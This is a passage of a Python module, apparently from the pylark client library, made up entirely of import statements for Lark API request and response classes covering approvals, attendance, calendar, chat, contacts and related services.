pylark.api_service_ai_recognize_basic_image import ( RecognizeBasicImageReq, RecognizeBasicImageResp, ) from pylark.api_service_ai_recognize_speech_file import ( RecognizeSpeechFileReqConfig, RecognizeSpeechFileReqSpeech, RecognizeSpeechFileReq, RecognizeSpeechFileResp, ) from pylark.api_service_ai_recognize_speech_stream import ( RecognizeSpeechStreamReqConfig, RecognizeSpeechStreamReqSpeech, RecognizeSpeechStreamReq, RecognizeSpeechStreamResp, ) from pylark.api_service_ai_translate_text import ( TranslateTextReqGlossary, TranslateTextReq, TranslateTextResp, ) from pylark.api_service_application import LarkApplicationService from pylark.api_service_application_app_admin_user_list import ( GetApplicationAppAdminUserListReq, GetApplicationAppAdminUserListRespUserOpenID, GetApplicationAppAdminUserListRespUser, GetApplicationAppAdminUserListResp, ) from pylark.api_service_application_app_list import ( GetApplicationAppListReq, GetApplicationAppListRespAppList, GetApplicationAppListResp, ) from pylark.api_service_application_app_visibility_get import ( GetApplicationAppVisibilityReq, 
GetApplicationAppVisibilityRespUser, GetApplicationAppVisibilityRespDepartment, GetApplicationAppVisibilityResp, ) from pylark.api_service_application_app_visibility_update import ( UpdateApplicationAppVisibilityReqAddUsers, UpdateApplicationAppVisibilityReqDelUsers, UpdateApplicationAppVisibilityReq, UpdateApplicationAppVisibilityResp, ) from pylark.api_service_application_is_user_admin import ( IsApplicationUserAdminReq, IsApplicationUserAdminResp, ) from pylark.api_service_application_message_detail import ( GetApplicationMessageDetailReq, GetApplicationMessageDetailRespUsersRead, GetApplicationMessageDetailRespTarget, GetApplicationMessageDetailResp, ) from pylark.api_service_application_message_overview import ( GetApplicationMessageOverviewReq, GetApplicationMessageOverviewRespGroupReadPv, GetApplicationMessageOverviewRespGroupRead, GetApplicationMessageOverviewRespGroupReceivedPv, GetApplicationMessageOverviewRespGroupReceived, GetApplicationMessageOverviewRespGroupSentPv, GetApplicationMessageOverviewRespGroupSent, GetApplicationMessageOverviewRespP2pReadPv, GetApplicationMessageOverviewRespP2pRead, GetApplicationMessageOverviewRespP2pReceivedPv, GetApplicationMessageOverviewRespP2pReceived, GetApplicationMessageOverviewRespP2pSentPv, GetApplicationMessageOverviewRespP2pSent, GetApplicationMessageOverviewResp, ) from pylark.api_service_application_message_trend import ( GetApplicationMessageTrendReq, GetApplicationMessageTrendRespGroupReadTimestamp, GetApplicationMessageTrendRespGroupRead, GetApplicationMessageTrendRespGroupReceivedTimestamp, GetApplicationMessageTrendRespGroupReceived, GetApplicationMessageTrendRespGroupSentTimestamp, GetApplicationMessageTrendRespGroupSent, GetApplicationMessageTrendRespP2pReadTimestamp, GetApplicationMessageTrendRespP2pRead, GetApplicationMessageTrendRespP2pReceivedTimestamp, GetApplicationMessageTrendRespP2pReceived, GetApplicationMessageTrendRespP2pSentTimestamp, GetApplicationMessageTrendRespP2pSent, GetApplicationMessageTrendResp, ) from pylark.api_service_application_order_get import ( GetApplicationOrderReq, GetApplicationOrderRespOrder, GetApplicationOrderResp, ) from pylark.api_service_application_order_list import ( GetApplicationOrderListReq, GetApplicationOrderListRespOrderList, GetApplicationOrderListResp, ) from pylark.api_service_application_paid_scope_check_user import ( CheckUserIsInApplicationPaidScopeReq, CheckUserIsInApplicationPaidScopeResp, ) from pylark.api_service_application_usage_detail import ( GetApplicationUsageDetailReqFilter, GetApplicationUsageDetailReq, GetApplicationUsageDetailRespUser, GetApplicationUsageDetailResp, ) from pylark.api_service_application_usage_overview import ( GetApplicationUsageOverviewReq, GetApplicationUsageOverviewRespItem, GetApplicationUsageOverviewResp, ) from pylark.api_service_application_usage_trend import ( GetApplicationUsageTrendReqFilter, GetApplicationUsageTrendReq, GetApplicationUsageTrendRespItemTrend, GetApplicationUsageTrendRespItem, GetApplicationUsageTrendResp, ) from pylark.api_service_application_user_admin_scope_get import ( GetApplicationUserAdminScopeReq, GetApplicationUserAdminScopeResp, ) from pylark.api_service_application_user_visible_app_get import ( GetApplicationUserVisibleAppReq, GetApplicationUserVisibleAppRespAppList, GetApplicationUserVisibleAppResp, ) from pylark.api_service_approval import LarkApprovalService from pylark.api_service_approval_approval_get import ( GetApprovalReq, GetApprovalRespViewer, GetApprovalRespNode, GetApprovalResp, ) from 
pylark.api_service_approval_carbon_copy_create import ( CreateApprovalCarbonCopyReq, CreateApprovalCarbonCopyResp, ) from pylark.api_service_approval_carbon_copy_search import ( SearchApprovalCarbonCopyReq, SearchApprovalCarbonCopyRespCcLink, SearchApprovalCarbonCopyRespCc, SearchApprovalCarbonCopyRespInstanceLink, SearchApprovalCarbonCopyRespInstance, SearchApprovalCarbonCopyRespGroup, SearchApprovalCarbonCopyRespApprovalExternal, SearchApprovalCarbonCopyRespApproval, SearchApprovalCarbonCopyResp, SearchApprovalCarbonCopyResp, ) from pylark.api_service_approval_file_upload import ( UploadApprovalFileReq, UploadApprovalFileResp, ) from pylark.api_service_approval_get_user_task_list import ( GetApprovalUserTaskListReq, GetApprovalUserTaskListRespCount, GetApprovalUserTaskListRespTaskURLs, GetApprovalUserTaskListRespTask, GetApprovalUserTaskListResp, ) from pylark.api_service_approval_instance_add_sign import ( AddApprovalInstanceSignReq, AddApprovalInstanceSignResp, ) from pylark.api_service_approval_instance_approve import ( ApproveApprovalInstanceReq, ApproveApprovalInstanceResp, ) from pylark.api_service_approval_instance_cancel import ( CancelApprovalInstanceReq, CancelApprovalInstanceResp, ) from pylark.api_service_approval_instance_create import ( CreateApprovalInstanceReq, CreateApprovalInstanceResp, ) from pylark.api_service_approval_instance_get import ( GetApprovalInstanceReq, GetApprovalInstanceRespTimelineExt, GetApprovalInstanceRespTimelineCcUser, GetApprovalInstanceRespTimeline, GetApprovalInstanceRespComment, GetApprovalInstanceRespTask, GetApprovalInstanceResp, ) from pylark.api_service_approval_instance_list import ( GetApprovalInstanceListReq, GetApprovalInstanceListResp, ) from pylark.api_service_approval_instance_preview import ( PreviewApprovalInstanceReqForm, PreviewApprovalInstanceReq, PreviewApprovalInstanceResp, ) from pylark.api_service_approval_instance_reject import ( RejectApprovalInstanceReq, RejectApprovalInstanceResp, ) from pylark.api_service_approval_instance_search import ( SearchApprovalInstanceReq, SearchApprovalInstanceRespInstanceInstanceLink, SearchApprovalInstanceRespInstanceInstance, SearchApprovalInstanceRespInstanceApprovalGroup, SearchApprovalInstanceRespInstanceApprovalExternal, SearchApprovalInstanceRespInstanceApproval, SearchApprovalInstanceRespInstance, SearchApprovalInstanceResp, ) from pylark.api_service_approval_instance_transfer import ( TransferApprovalInstanceReq, TransferApprovalInstanceResp, ) from pylark.api_service_approval_message_update import ( UpdateApprovalMessageReq, UpdateApprovalMessageResp, ) from pylark.api_service_approval_task_search import ( SearchApprovalTaskReq, SearchApprovalTaskRespTaskTaskLink, SearchApprovalTaskRespTaskTask, SearchApprovalTaskRespTaskInstanceLink, SearchApprovalTaskRespTaskInstance, SearchApprovalTaskRespTaskGroup, SearchApprovalTaskRespTaskApprovalExternal, SearchApprovalTaskRespTaskApproval, SearchApprovalTaskRespTask, SearchApprovalTaskResp, ) from pylark.api_service_attendance import LarkAttendanceService from pylark.api_service_attendance_file_download import ( DownloadAttendanceFileReq, DownloadAttendanceFileResp, DownloadAttendanceFileResp, ) from pylark.api_service_attendance_file_upload import ( UploadAttendanceFileReq, UploadAttendanceFileRespFile, UploadAttendanceFileResp, ) from pylark.api_service_attendance_group_create_update import ( CreateUpdateAttendanceGroupReqGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupReqGroupNeedPunchSpecialDay, 
CreateUpdateAttendanceGroupReqGroupFreePunchCfg, CreateUpdateAttendanceGroupReqGroupLocation, CreateUpdateAttendanceGroupReqGroupMachine, CreateUpdateAttendanceGroupReqGroup, CreateUpdateAttendanceGroupReq, CreateUpdateAttendanceGroupRespGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupFreePunchCfg, CreateUpdateAttendanceGroupRespGroupLocation, CreateUpdateAttendanceGroupRespGroupMachine, CreateUpdateAttendanceGroupRespGroup, CreateUpdateAttendanceGroupResp, ) from pylark.api_service_attendance_group_delete import ( DeleteAttendanceGroupReq, DeleteAttendanceGroupResp, ) from pylark.api_service_attendance_group_get import ( GetAttendanceGroupReq, GetAttendanceGroupRespGroupIDNoNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDFreePunchCfg, GetAttendanceGroupRespGroupIDLocation, GetAttendanceGroupRespGroupIDMachine, GetAttendanceGroupRespGroupID, GetAttendanceGroupResp, ) from pylark.api_service_attendance_remedy_approval_init import ( InitAttendanceRemedyApprovalReq, InitAttendanceRemedyApprovalRespUserRemedy, InitAttendanceRemedyApprovalResp, ) from pylark.api_service_attendance_remedy_approval_update import ( UpdateAttendanceRemedyApprovalReq, UpdateAttendanceRemedyApprovalRespApprovalInfo, UpdateAttendanceRemedyApprovalResp, ) from pylark.api_service_attendance_shift_create import ( CreateAttendanceShiftReqRestTimeRule, CreateAttendanceShiftReqLateOffLateOnRule, CreateAttendanceShiftReqPunchTimeRule, CreateAttendanceShiftReq, CreateAttendanceShiftRespShiftRestTimeRule, CreateAttendanceShiftRespShiftLateOffLateOnRule, CreateAttendanceShiftRespShiftPunchTimeRule, CreateAttendanceShiftRespShift, CreateAttendanceShiftResp, ) from pylark.api_service_attendance_shift_delete import ( DeleteAttendanceShiftReq, DeleteAttendanceShiftResp, ) from pylark.api_service_attendance_shift_get_by_id import ( GetAttendanceShiftByIDReq, GetAttendanceShiftByIDRespRestTimeRule, GetAttendanceShiftByIDRespLateOffLateOnRule, GetAttendanceShiftByIDRespPunchTimeRule, GetAttendanceShiftByIDResp, ) from pylark.api_service_attendance_shift_get_by_name import ( GetAttendanceShiftByNameReq, GetAttendanceShiftByNameRespRestTimeRule, GetAttendanceShiftByNameRespLateOffLateOnRule, GetAttendanceShiftByNameRespPunchTimeRule, GetAttendanceShiftByNameResp, ) from pylark.api_service_attendance_statistics_data_get import ( GetAttendanceStatisticsDataReq, GetAttendanceStatisticsDataRespUserDataDataFeature, GetAttendanceStatisticsDataRespUserDataData, GetAttendanceStatisticsDataRespUserData, GetAttendanceStatisticsDataResp, ) from pylark.api_service_attendance_statistics_header_get import ( GetAttendanceStatisticsHeaderReq, GetAttendanceStatisticsHeaderRespUserStatsFieldFieldChildField, GetAttendanceStatisticsHeaderRespUserStatsFieldField, GetAttendanceStatisticsHeaderRespUserStatsField, GetAttendanceStatisticsHeaderResp, ) from pylark.api_service_attendance_user_allowed_remedy_get import ( GetAttendanceUserAllowedRemedyReq, GetAttendanceUserAllowedRemedyRespUserAllowedRemedys, GetAttendanceUserAllowedRemedyResp, ) from pylark.api_service_attendance_user_approval_create import ( CreateAttendanceUserApprovalReqUserApprovalTrip, CreateAttendanceUserApprovalReqUserApprovalOvertimeWork, CreateAttendanceUserApprovalReqUserApprovalLeave, CreateAttendanceUserApprovalReqUserApprovalOut, CreateAttendanceUserApprovalReqUserApproval, CreateAttendanceUserApprovalReq, CreateAttendanceUserApprovalRespUserApprovalTrip, 
CreateAttendanceUserApprovalRespUserApprovalOvertimeWork, CreateAttendanceUserApprovalRespUserApprovalLeave, CreateAttendanceUserApprovalRespUserApprovalOut, CreateAttendanceUserApprovalRespUserApproval, CreateAttendanceUserApprovalResp, ) from pylark.api_service_attendance_user_approval_get import ( GetAttendanceUserApprovalReq, GetAttendanceUserApprovalRespUserApprovalTrip, GetAttendanceUserApprovalRespUserApprovalOvertimeWork, GetAttendanceUserApprovalRespUserApprovalLeave, GetAttendanceUserApprovalRespUserApprovalOut, GetAttendanceUserApprovalRespUserApproval, GetAttendanceUserApprovalResp, ) from pylark.api_service_attendance_user_daily_shift_create_update import ( CreateUpdateAttendanceUserDailyShiftReqUserDailyShift, CreateUpdateAttendanceUserDailyShiftReq, CreateUpdateAttendanceUserDailyShiftRespUserDailyShift, CreateUpdateAttendanceUserDailyShiftResp, ) from pylark.api_service_attendance_user_daily_shift_get import ( GetAttendanceUserDailyShiftReq, GetAttendanceUserDailyShiftRespUserDailyShift, GetAttendanceUserDailyShiftResp, ) from pylark.api_service_attendance_user_flow_batch_create import ( BatchCreateAttendanceUserFlowReqFlowRecord, BatchCreateAttendanceUserFlowReq, BatchCreateAttendanceUserFlowRespFlowRecord, BatchCreateAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_flow_batch_get import ( BatchGetAttendanceUserFlowReq, BatchGetAttendanceUserFlowRespUserFlowResult, BatchGetAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_flow_get import ( GetAttendanceUserFlowReq, GetAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_settings_query import ( QueryAttendanceUserSettingsReq, QueryAttendanceUserSettingsRespUserSetting, QueryAttendanceUserSettingsResp, ) from pylark.api_service_attendance_user_settings_update import ( UpdateAttendanceUserSettingsReqUserSetting, UpdateAttendanceUserSettingsReq, UpdateAttendanceUserSettingsRespUserSetting, UpdateAttendanceUserSettingsResp, ) from pylark.api_service_attendance_user_statistics_settings_get import ( GetAttendanceUserStatisticsSettingsReq, GetAttendanceUserStatisticsSettingsRespViewItemChildItem, GetAttendanceUserStatisticsSettingsRespViewItem, GetAttendanceUserStatisticsSettingsRespView, GetAttendanceUserStatisticsSettingsResp, ) from pylark.api_service_attendance_user_statistics_settings_update import ( UpdateAttendanceUserStatisticsSettingsReqViewItemChildItem, UpdateAttendanceUserStatisticsSettingsReqViewItem, UpdateAttendanceUserStatisticsSettingsReqView, UpdateAttendanceUserStatisticsSettingsReq, UpdateAttendanceUserStatisticsSettingsRespViewItemChildItem, UpdateAttendanceUserStatisticsSettingsRespViewItem, UpdateAttendanceUserStatisticsSettingsRespView, UpdateAttendanceUserStatisticsSettingsResp, ) from pylark.api_service_attendance_user_task_get import ( GetAttendanceUserTaskReq, GetAttendanceUserTaskRespUserTaskResultRecordCheckOutRecord, GetAttendanceUserTaskRespUserTaskResultRecordCheckInRecord, GetAttendanceUserTaskRespUserTaskResultRecord, GetAttendanceUserTaskRespUserTaskResult, GetAttendanceUserTaskResp, ) from pylark.api_service_attendance_user_task_remedy_get import ( GetAttendanceUserTaskRemedyReq, GetAttendanceUserTaskRemedyRespUserRemedy, GetAttendanceUserTaskRemedyResp, ) from pylark.api_service_auth import LarkAuthService from pylark.api_service_auth_access_token_get import ( GetAccessTokenReq, GetAccessTokenResp, ) from pylark.api_service_auth_access_token_refresh import ( RefreshAccessTokenReq, RefreshAccessTokenResp, ) from 
pylark.api_service_auth_app_ticket_resend import ( ResendAppTicketReq, ResendAppTicketResp, ) from pylark.api_service_auth_tenant_access_token_get import ( GetTenantAccessTokenReq, TokenExpire, ) from pylark.api_service_auth_user_info_get import GetUserInfoReq, GetUserInfoResp from pylark.api_service_bitable import LarkBitableService from pylark.api_service_bitable_field_create import ( CreateBitableFieldReqPropertyOption, CreateBitableFieldReqProperty, CreateBitableFieldReq, CreateBitableFieldRespFieldPropertyOption, CreateBitableFieldRespFieldProperty, CreateBitableFieldRespField, CreateBitableFieldResp, ) from pylark.api_service_bitable_field_delete import ( DeleteBitableFieldReq, DeleteBitableFieldResp, ) from pylark.api_service_bitable_field_list import ( GetBitableFieldListReq, GetBitableFieldListRespItemPropertyOption, GetBitableFieldListRespItemProperty, GetBitableFieldListRespItem, GetBitableFieldListResp, ) from pylark.api_service_bitable_field_update import ( UpdateBitableFieldReqPropertyOption, UpdateBitableFieldReqProperty, UpdateBitableFieldReq, UpdateBitableFieldRespFieldPropertyOption, UpdateBitableFieldRespFieldProperty, UpdateBitableFieldRespField, UpdateBitableFieldResp, ) from pylark.api_service_bitable_meta_get import ( GetBitableMetaReq, GetBitableMetaRespApp, GetBitableMetaResp, ) from pylark.api_service_bitable_record_batch_create import ( BatchCreateBitableRecordReqRecord, BatchCreateBitableRecordReq, BatchCreateBitableRecordRespRecord, BatchCreateBitableRecordResp, ) from pylark.api_service_bitable_record_batch_delete import ( BatchDeleteBitableRecordReq, BatchDeleteBitableRecordRespRecord, BatchDeleteBitableRecordResp, ) from pylark.api_service_bitable_record_batch_update import ( BatchUpdateBitableRecordReqRecord, BatchUpdateBitableRecordReq, BatchUpdateBitableRecordRespRecord, BatchUpdateBitableRecordResp, ) from pylark.api_service_bitable_record_create import ( CreateBitableRecordReq, CreateBitableRecordRespRecord, CreateBitableRecordResp, ) from pylark.api_service_bitable_record_delete import ( DeleteBitableRecordReq, DeleteBitableRecordResp, ) from pylark.api_service_bitable_record_get import ( GetBitableRecordReq, GetBitableRecordRespRecord, GetBitableRecordResp, ) from pylark.api_service_bitable_record_list import ( GetBitableRecordListReq, GetBitableRecordListRespItem, GetBitableRecordListResp, ) from pylark.api_service_bitable_record_update import ( UpdateBitableRecordReq, UpdateBitableRecordRespRecord, UpdateBitableRecordResp, ) from pylark.api_service_bitable_table_batch_create import ( BatchCreateBitableTableReqTable, BatchCreateBitableTableReq, BatchCreateBitableTableResp, ) from pylark.api_service_bitable_table_batch_delete import ( BatchDeleteBitableTableReq, BatchDeleteBitableTableResp, ) from pylark.api_service_bitable_table_create import ( CreateBitableTableReqTable, CreateBitableTableReq, CreateBitableTableResp, ) from pylark.api_service_bitable_table_delete import ( DeleteBitableTableReq, DeleteBitableTableResp, ) from pylark.api_service_bitable_table_list import ( GetBitableTableListReq, GetBitableTableListRespItem, GetBitableTableListResp, ) from pylark.api_service_bitable_view_create import ( CreateBitableViewReq, CreateBitableViewRespApptableview, CreateBitableViewResp, ) from pylark.api_service_bitable_view_delete import ( DeleteBitableViewReq, DeleteBitableViewResp, ) from pylark.api_service_bitable_view_list import ( GetBitableViewListReq, GetBitableViewListRespItem, GetBitableViewListResp, ) from pylark.api_service_bot import 
LarkBotService from pylark.api_service_bot_add import AddBotToChatReq, AddBotToChatResp from pylark.api_service_bot_info import GetBotInfoReq, GetBotInfoResp from pylark.api_service_calendar import LarkCalendarService from pylark.api_service_calendar_acl_create import ( CreateCalendarACLReqScope, CreateCalendarACLReq, CreateCalendarACLRespScope, CreateCalendarACLResp, ) from pylark.api_service_calendar_acl_delete import ( DeleteCalendarACLReq, DeleteCalendarACLResp, ) from pylark.api_service_calendar_acl_get_list import ( GetCalendarACLListReq, GetCalendarACLListRespACLScope, GetCalendarACLListRespACL, GetCalendarACLListResp, ) from pylark.api_service_calendar_acl_subscribe import ( SubscribeCalendarACLReq, SubscribeCalendarACLResp, ) from pylark.api_service_calendar_calendar_create import ( CreateCalendarReq, CreateCalendarRespCalendar, CreateCalendarResp, ) from pylark.api_service_calendar_calendar_delete import ( DeleteCalendarReq, DeleteCalendarResp, ) from pylark.api_service_calendar_calendar_event_attendee_chat_member_list import ( GetCalendarEventAttendeeChatMemberListReq, GetCalendarEventAttendeeChatMemberListRespItem, GetCalendarEventAttendeeChatMemberListResp, ) from pylark.api_service_calendar_calendar_event_attendee_create import ( CreateCalendarEventAttendeeReqAttendee, CreateCalendarEventAttendeeReq, CreateCalendarEventAttendeeRespAttendeeChatMember, CreateCalendarEventAttendeeRespAttendee, CreateCalendarEventAttendeeResp, ) from pylark.api_service_calendar_calendar_event_attendee_delete import ( DeleteCalendarEventAttendeeReq, DeleteCalendarEventAttendeeResp, ) from pylark.api_service_calendar_calendar_event_attendee_get_list import ( GetCalendarEventAttendeeListReq, GetCalendarEventAttendeeListRespItemChatMember, GetCalendarEventAttendeeListRespItem, GetCalendarEventAttendeeListResp, ) from pylark.api_service_calendar_calendar_event_create import ( CreateCalendarEventReqSchema, CreateCalendarEventReqReminder, CreateCalendarEventReqLocation, CreateCalendarEventReqVchat, CreateCalendarEventReqEndTime, CreateCalendarEventReqStartTime, CreateCalendarEventReq, CreateCalendarEventRespEventSchema, CreateCalendarEventRespEventReminder, CreateCalendarEventRespEventLocation, CreateCalendarEventRespEventVchat, CreateCalendarEventRespEventEndTime, CreateCalendarEventRespEventStartTime, CreateCalendarEventRespEvent, CreateCalendarEventResp, ) from pylark.api_service_calendar_calendar_event_delete import ( DeleteCalendarEventReq, DeleteCalendarEventResp, ) from pylark.api_service_calendar_calendar_event_get import ( GetCalendarEventReq, GetCalendarEventRespEventSchema, GetCalendarEventRespEventReminder, GetCalendarEventRespEventLocation, GetCalendarEventRespEventVchat, GetCalendarEventRespEventEndTime, GetCalendarEventRespEventStartTime, GetCalendarEventRespEvent, GetCalendarEventResp, ) from pylark.api_service_calendar_calendar_event_get_list import ( GetCalendarEventListReq, GetCalendarEventListRespItemSchema, GetCalendarEventListRespItemReminder, GetCalendarEventListRespItemLocation, GetCalendarEventListRespItemVchat, GetCalendarEventListRespItemEndTime, GetCalendarEventListRespItemStartTime, GetCalendarEventListRespItem, GetCalendarEventListResp, ) from pylark.api_service_calendar_calendar_event_patch import ( UpdateCalendarEventReqSchema, UpdateCalendarEventReqReminder, UpdateCalendarEventReqLocation, UpdateCalendarEventReqVchat, UpdateCalendarEventReqEndTime, UpdateCalendarEventReqStartTime, UpdateCalendarEventReq, UpdateCalendarEventRespEventSchema, 
UpdateCalendarEventRespEventReminder, UpdateCalendarEventRespEventLocation, UpdateCalendarEventRespEventVchat, UpdateCalendarEventRespEventEndTime, UpdateCalendarEventRespEventStartTime, UpdateCalendarEventRespEvent, UpdateCalendarEventResp, ) from pylark.api_service_calendar_calendar_event_search import ( SearchCalendarEventReqFilterEndTime, SearchCalendarEventReqFilterStartTime, SearchCalendarEventReqFilter, SearchCalendarEventReq, SearchCalendarEventRespItemSchema, SearchCalendarEventRespItemReminder, SearchCalendarEventRespItemLocation, SearchCalendarEventRespItemVchat, SearchCalendarEventRespItemEndTime, SearchCalendarEventRespItemStartTime, SearchCalendarEventRespItem, SearchCalendarEventResp, ) from pylark.api_service_calendar_calendar_event_subscribe import ( SubscribeCalendarEventReq, SubscribeCalendarEventResp, ) from pylark.api_service_calendar_calendar_freebusy_get_list import ( GetCalendarFreeBusyListReq, GetCalendarFreeBusyListRespFreebusy, GetCalendarFreeBusyListResp, ) from pylark.api_service_calendar_calendar_get import GetCalendarReq, GetCalendarResp from pylark.api_service_calendar_calendar_get_list import ( GetCalendarListReq, GetCalendarListRespCalendar, GetCalendarListResp, ) from pylark.api_service_calendar_calendar_patch import ( UpdateCalendarReq, UpdateCalendarRespCalendar, UpdateCalendarResp, ) from pylark.api_service_calendar_calendar_search import ( SearchCalendarReq, SearchCalendarRespItem, SearchCalendarResp, ) from pylark.api_service_calendar_calendar_subscribe import ( SubscribeCalendarReq, SubscribeCalendarRespCalendar, SubscribeCalendarResp, ) from pylark.api_service_calendar_calendar_subscription import ( SubscribeCalendarChangeEventReq, SubscribeCalendarChangeEventResp, ) from pylark.api_service_calendar_calendar_timeoff_event_create import ( CreateCalendarTimeoffEventReq, CreateCalendarTimeoffEventResp, ) from pylark.api_service_calendar_calendar_timeoff_event_delete import ( DeleteCalendarTimeoffEventReq, DeleteCalendarTimeoffEventResp, ) from pylark.api_service_calendar_calendar_unsubscribe import ( UnsubscribeCalendarReq, UnsubscribeCalendarResp, ) from pylark.api_service_calendar_generate_caldav_conf import ( GenerateCaldavConfReq, GenerateCaldavConfResp, ) from pylark.api_service_chat import LarkChatService from pylark.api_service_chat_announcement_get import ( GetChatAnnouncementReq, GetChatAnnouncementResp, ) from pylark.api_service_chat_announcement_update import ( UpdateChatAnnouncementReq, UpdateChatAnnouncementResp, ) from pylark.api_service_chat_create import CreateChatReq, CreateChatResp from pylark.api_service_chat_delete import DeleteChatReq, DeleteChatResp from pylark.api_service_chat_get import GetChatReq, GetChatResp from pylark.api_service_chat_get_list_of_self import ( GetChatListOfSelfReq, GetChatListOfSelfRespItem, GetChatListOfSelfResp, ) from pylark.api_service_chat_get_old import ( GetChatOldReq, GetChatOldRespMember, GetChatOldResp, ) from pylark.api_service_chat_join import JoinChatReq, JoinChatResp from pylark.api_service_chat_member_add import AddChatMemberReq, AddChatMemberResp from pylark.api_service_chat_member_delete import ( DeleteChatMemberReq, DeleteChatMemberResp, ) from pylark.api_service_chat_member_get_list import ( GetChatMemberListReq, GetChatMemberListRespItem, GetChatMemberListResp, ) from pylark.api_service_chat_member_in import IsInChatReq, IsInChatResp from pylark.api_service_chat_search import ( SearchChatReq, SearchChatRespItem, SearchChatResp, ) from pylark.api_service_chat_update import UpdateChatReq, 
UpdateChatResp from pylark.api_service_contact import LarkContactService from pylark.api_service_contact_custom_attr_list import ( GetContactCustomAttrListReq, GetContactCustomAttrListRespItemI18nName, GetContactCustomAttrListRespItemOptionsOption, GetContactCustomAttrListRespItemOptions, GetContactCustomAttrListRespItem, GetContactCustomAttrListResp, ) from pylark.api_service_contact_department_create import ( CreateDepartmentReqI18nName, CreateDepartmentReq, CreateDepartmentRespDepartmentStatus, CreateDepartmentRespDepartmentI18nName, CreateDepartmentRespDepartment, CreateDepartmentResp, ) from pylark.api_service_contact_department_delete import ( DeleteDepartmentReq, DeleteDepartmentResp, ) from pylark.api_service_contact_department_get import ( GetDepartmentReq, GetDepartmentRespDepartmentStatus, GetDepartmentRespDepartmentI18nName, GetDepartmentRespDepartment, GetDepartmentResp, ) from pylark.api_service_contact_department_get_list import ( GetDepartmentListReq, GetDepartmentListRespItemStatus, GetDepartmentListRespItemI18nName, GetDepartmentListRespItem, GetDepartmentListResp, ) from pylark.api_service_contact_department_get_parent import ( GetParentDepartmentReq, GetParentDepartmentRespItemStatus, GetParentDepartmentRespItemI18nName, GetParentDepartmentRespItem, GetParentDepartmentResp, ) from pylark.api_service_contact_department_search import ( SearchDepartmentReq, SearchDepartmentRespItemStatus, SearchDepartmentRespItemI18nName, SearchDepartmentRespItem, SearchDepartmentResp, ) from pylark.api_service_contact_department_update import ( UpdateDepartmentReqI18nName, UpdateDepartmentReq, UpdateDepartmentRespDepartmentStatus, UpdateDepartmentRespDepartmentI18nName, UpdateDepartmentRespDepartment, UpdateDepartmentResp, ) from pylark.api_service_contact_department_update_patch import ( UpdateDepartmentPatchReqI18nName, UpdateDepartmentPatchReq, UpdateDepartmentPatchRespDepartmentStatus, UpdateDepartmentPatchRespDepartmentI18nName, UpdateDepartmentPatchRespDepartment, UpdateDepartmentPatchResp, ) from pylark.api_service_contact_employee_type_enums_create import ( CreateEmployeeTypeEnumReqI18nContent, CreateEmployeeTypeEnumReq, CreateEmployeeTypeEnumRespEmployeeTypeEnumI18nContent, CreateEmployeeTypeEnumRespEmployeeTypeEnum, CreateEmployeeTypeEnumResp, ) from pylark.api_service_contact_employee_type_enums_delete import ( DeleteEmployeeTypeEnumReq, DeleteEmployeeTypeEnumResp, ) from pylark.api_service_contact_employee_type_enums_list import ( GetEmployeeTypeEnumListReq, GetEmployeeTypeEnumListRespItemI18nContent, GetEmployeeTypeEnumListRespItem, GetEmployeeTypeEnumListResp, ) from pylark.api_service_contact_employee_type_enums_update import ( UpdateEmployeeTypeEnumPatchReqI18nContent, UpdateEmployeeTypeEnumPatchReq, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnumI18nContent, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnum, UpdateEmployeeTypeEnumPatchResp, ) from pylark.api_service_contact_group_Delete import ( DeleteContactGroupReq, DeleteContactGroupResp, ) from pylark.api_service_contact_group_Get import ( GetContactGroupReq, GetContactGroupRespGroup, GetContactGroupResp, ) from pylark.api_service_contact_group_create import ( CreateContactGroupReq, CreateContactGroupResp, ) from pylark.api_service_contact_group_get_list import ( GetContactGroupListReq, GetContactGroupListRespGroup, GetContactGroupListResp, ) from pylark.api_service_contact_group_member_add import ( AddContactGroupMemberReq, AddContactGroupMemberResp, ) from pylark.api_service_contact_group_member_delete import ( 
DeleteContactGroupMemberReq, DeleteContactGroupMemberResp, ) from pylark.api_service_contact_group_member_get import ( GetContactGroupMemberReq, GetContactGroupMemberRespMember, GetContactGroupMemberResp, ) from pylark.api_service_contact_group_update import ( UpdateContactGroupReq, UpdateContactGroupResp, ) from pylark.api_service_contact_unit_bind_department import ( BindContactUnitDepartmentReq, BindContactUnitDepartmentResp, ) from pylark.api_service_contact_unit_create import ( CreateContactUnitReq, CreateContactUnitResp, ) from pylark.api_service_contact_unit_delete import ( DeleteContactUnitReq, DeleteContactUnitResp, ) from pylark.api_service_contact_unit_get import ( GetContactUnitReq, GetContactUnitRespUnit, GetContactUnitResp, ) from pylark.api_service_contact_unit_list import ( GetContactUnitListReq, GetContactUnitListRespUnit, GetContactUnitListResp, ) from pylark.api_service_contact_unit_list_department import ( GetContactUnitDepartmentListReq, GetContactUnitDepartmentListRespDepartment, GetContactUnitDepartmentListResp, ) from pylark.api_service_contact_unit_unbind_department import ( UnbindContactUnitDepartmentReq, UnbindContactUnitDepartmentResp, ) from pylark.api_service_contact_unit_update import ( UpdateContactUnitReq, UpdateContactUnitResp, ) from pylark.api_service_contact_user_create import ( CreateUserReqNotificationOption, CreateUserReqCustomAttrValueGenericUser, CreateUserReqCustomAttrValue, CreateUserReqCustomAttr, CreateUserReqOrder, CreateUserReq, CreateUserRespUserNotificationOption, CreateUserRespUserCustomAttrValueGenericUser, CreateUserRespUserCustomAttrValue, CreateUserRespUserCustomAttr, CreateUserRespUserOrder, CreateUserRespUserStatus, CreateUserRespUserAvatar, CreateUserRespUser, CreateUserResp, ) from pylark.api_service_contact_user_delete import DeleteUserReq, DeleteUserResp from pylark.api_service_contact_user_get import ( GetUserReq, GetUserRespUserCustomAttrValueGenericUser, GetUserRespUserCustomAttrValue, GetUserRespUserCustomAttr, GetUserRespUserOrder, GetUserRespUserStatus, GetUserRespUserAvatar, GetUserRespUser, GetUserResp, ) from pylark.api_service_contact_user_get_batch import ( BatchGetUserReq, BatchGetUserRespUserInfo, BatchGetUserResp, ) from pylark.api_service_contact_user_get_batch_by_id import ( BatchGetUserByIDReq, 